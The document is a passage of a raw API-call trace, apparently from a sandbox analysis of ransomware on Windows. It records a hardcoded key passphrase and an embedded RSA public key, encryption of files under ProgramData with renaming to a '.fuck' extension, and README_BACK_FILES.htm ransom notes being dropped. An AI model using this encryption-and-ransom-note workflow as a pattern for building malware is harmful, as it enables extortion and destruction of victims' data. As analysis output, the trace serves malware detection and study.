(hProv=0x28167e8, dwFlags=0x0) returned 1 [0236.451] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.452] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.452] GetLastError () returned 0x5 [0236.452] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man")) returned 0x20 [0236.452] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man", dwFileAttributes=0x80) returned 0 [0236.452] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.452] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.453] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg", dwFileAttributes=0x2) returned 0 [0236.453] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2815ff0) returned 1 [0236.458] CryptCreateHash (in: hProv=0x2815ff0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.458] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.458] CryptHashData (hHash=0x2816d58, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.458] CryptDeriveKey (in: hProv=0x2815ff0, Algid=0x6610, hBaseData=0x2816d58, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817058) returned 1 [0236.458] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.458] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.459] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2816760) returned 1 [0236.460] CryptImportPublicKeyInfo (in: hCryptProv=0x2816760, dwCertEncodingType=0x1, pInfo=0x2808cb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2808ce0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2808ce8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2816d98) returned 1 [0236.460] CryptEncrypt (in: hKey=0x2816d98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.460] CryptEncrypt (in: hKey=0x2816d98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815e58*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2815e58*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.460] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815e58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.460] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.460] CryptEncrypt (in: hKey=0x2817058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.460] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.460] CloseHandle (hObject=0xffffffff) returned 1 [0236.460] CloseHandle (hObject=0xffffffff) returned 1 [0236.460] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), bFailIfExists=0) returned 0 [0236.461] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man", dwFileAttributes=0x0) returned 0 [0236.461] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.gsg")) returned 0 [0236.461] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\msoutilstat.etw.man.fuck")) returned 0 [0236.462] CryptDestroyHash (hHash=0x2816d58) returned 1 [0236.462] CryptDestroyKey (hKey=0x2817058) returned 1 [0236.462] CryptReleaseContext (hProv=0x2815ff0, dwFlags=0x0) returned 1 [0236.462] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.462] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.471] GetLastError () returned 0x5 [0236.471] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man")) returned 0x20 [0236.471] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man", dwFileAttributes=0x80) returned 0 [0236.472] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.472] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.472] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg", dwFileAttributes=0x2) returned 0 [0236.472] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2816980) returned 1 [0236.478] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.478] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.478] CryptHashData (hHash=0x2816cd8, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.478] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2816cd8, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2817398) returned 1 [0236.478] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.478] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.478] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2816a90) returned 1 [0236.481] CryptImportPublicKeyInfo (in: hCryptProv=0x2816a90, dwCertEncodingType=0x1, pInfo=0x28098e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809918*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2816dd8) returned 1 [0236.481] CryptEncrypt (in: hKey=0x2816dd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.481] CryptEncrypt (in: hKey=0x2816dd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2815f68*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2815f68*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.481] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2815f68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.481] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279cfa0, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.481] CryptEncrypt (in: hKey=0x2817398, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279cfa0*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.481] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279cfa0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.481] CloseHandle (hObject=0xffffffff) returned 1 [0236.481] CloseHandle (hObject=0xffffffff) returned 1 [0236.482] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), bFailIfExists=0) returned 0 [0236.482] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man", dwFileAttributes=0x0) returned 0 [0236.482] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.gsg")) returned 0 [0236.482] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\wordetw.man.fuck")) returned 0 [0236.483] CryptDestroyHash (hHash=0x2816cd8) returned 1 [0236.483] CryptDestroyKey (hKey=0x2817398) returned 1 [0236.483] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.483] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.483] FindClose (in: hFindFile=0x27ebc20 | out: hFindFile=0x27ebc20) returned 1 [0236.483] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm")) returned 0xffffffff [0236.483] AreFileApisANSI () returned 1 [0236.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2940, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0236.483] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.484] GetLastError () returned 0x5 [0236.484] GetLastError () returned 0x5 [0236.484] FindNextFileA (in: hFindFile=0x2716b68, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0236.484] FindClose (in: hFindFile=0x2716b68 | out: hFindFile=0x2716b68) returned 1 [0236.484] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\readme_back_files.htm")) returned 0xffffffff [0236.484] AreFileApisANSI () returned 1 [0236.484] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0236.484] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.485] GetLastError () returned 0x5 [0236.485] GetLastError () returned 0x5 [0236.485] FindNextFileA (in: hFindFile=0x2716c68, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0236.485] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x2817298 [0236.485] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.485] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.485] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2816cd8 [0236.485] FindNextFileA (in: hFindFile=0x2816cd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.486] FindNextFileA (in: hFindFile=0x2816cd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.486] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2816fd8 [0236.486] FindNextFileA (in: hFindFile=0x2816fd8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.486] FindNextFileA (in: hFindFile=0x2816fd8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.486] FindClose (in: hFindFile=0x2816fd8 | out: hFindFile=0x2816fd8) returned 1 [0236.486] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\readme_back_files.htm")) returned 0xffffffff [0236.487] AreFileApisANSI () returned 1 [0236.487] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0236.487] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\machinekeys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0236.489] GetFileType (hFile=0x5d14) returned 0x1 [0236.489] WriteFile (in: hFile=0x5d14, lpBuffer=0x2b9d7f8*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d7f0, lpOverlapped=0x0 | out: lpBuffer=0x2b9d7f8*, lpNumberOfBytesWritten=0x2b9d7f0*=0x5ec, lpOverlapped=0x0) returned 1 [0236.491] FindNextFileA (in: hFindFile=0x2816cd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.491] FindClose (in: hFindFile=0x2816cd8 | out: hFindFile=0x2816cd8) returned 1 [0236.491] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\readme_back_files.htm")) returned 0xffffffff [0236.491] AreFileApisANSI () returned 1 [0236.491] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0236.491] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\DSS\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\dss\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.491] GetLastError () returned 0x5 [0236.491] GetLastError () returned 0x5 [0236.491] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.492] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\Keys\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2816f58 [0236.493] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.493] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.493] FindClose (in: hFindFile=0x2816f58 | out: hFindFile=0x2816f58) returned 1 [0236.493] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\Keys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\readme_back_files.htm")) returned 0xffffffff [0236.493] AreFileApisANSI () returned 1 [0236.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd268, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0236.493] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\Keys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\keys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.493] GetLastError () returned 0x5 [0236.493] GetLastError () returned 0x5 [0236.494] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.494] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2816e18 [0236.494] FindNextFileA (in: hFindFile=0x2816e18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.494] FindNextFileA (in: hFindFile=0x2816e18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.494] FindNextFileA (in: hFindFile=0x2816e18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0236.494] FindClose (in: hFindFile=0x2816e18 | out: hFindFile=0x2816e18) returned 1 [0236.494] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\readme_back_files.htm")) returned 0xffffffff [0236.494] AreFileApisANSI () returned 1 [0236.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0236.494] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\PCPKSP\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\pcpksp\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.495] GetLastError () returned 0x5 [0236.495] GetLastError () returned 0x5 [0236.495] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0236.495] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28171d8 [0236.495] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.495] FindNextFileA (in: hFindFile=0x28171d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.495] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2816d18 [0236.496] FindNextFileA (in: hFindFile=0x2816d18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.496] FindNextFileA (in: hFindFile=0x2816d18, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.496] FindClose (in: hFindFile=0x2816d18 | out: hFindFile=0x2816d18) returned 1 [0236.497] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\readme_back_files.htm")) returned 0xffffffff [0236.497] AreFileApisANSI () returned 1 [0236.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f69a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0236.497] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d14 [0236.497] GetFileType (hFile=0x5d14) returned 0x1 [0236.497] WriteFile 